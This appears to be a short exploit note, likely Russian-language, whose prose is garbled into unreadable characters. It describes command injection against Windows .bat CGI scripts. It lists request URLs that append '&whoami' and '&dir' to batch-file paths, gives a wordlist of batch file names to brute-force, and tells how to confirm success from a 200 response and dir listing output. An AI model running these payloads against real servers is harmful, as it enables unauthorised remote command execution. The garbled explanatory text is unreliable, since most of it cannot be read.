����������� �������
����
EXPLOIT
http://localhost/cgi-bin/hello.bat?&whoami
����������
http://domain.com/cgi-bin/hello.bat?&dir
http://domain.com/cgi-bin/hello.bat?&dir
http://domain.com/cgi-bin/test.bat?&dir
http://domain.com/cgi-bin/info.bat?&dir
http://domain.com/cgi-bin/0.bat?&dir
http://domain.com/cgi-bin/1.bat?&dir
������� ����������, ���� ���� �� ��������� ��� �������� ��������, ���� ���� ��
������� ������ ��� �����.
��� ����� ������, ������� ������ ��������� - ��� ����� ����� ������ � ������ �
���������, � �������� ���������.
hello.bat
helloworld.bat
test.bat
index.bat
info.bat
sysinfo.bat
run.bat
tomcat.bat
0.bat
1.bat
2.bat
...
10.bat
����� ����, �� ������� ����� ������� ����� �������� ����� �� 0 �� 9 � ��� �����.
�� ����, �� ����� hello.bat �� ��������� �������� ��������:
hello.bat
hello0.bat
hello1.bat
..
hello9.bat
4. ���� ��� ������� ��� 200 � �����, ������� ���������������� ����� �� �������
���������:
- �� ������� dir � ������ ������ ���� ���������� ��������
mm.dd.YYYY HH:mm <DIR> .
mm.dd.YYYY HH:mm <DIR> ..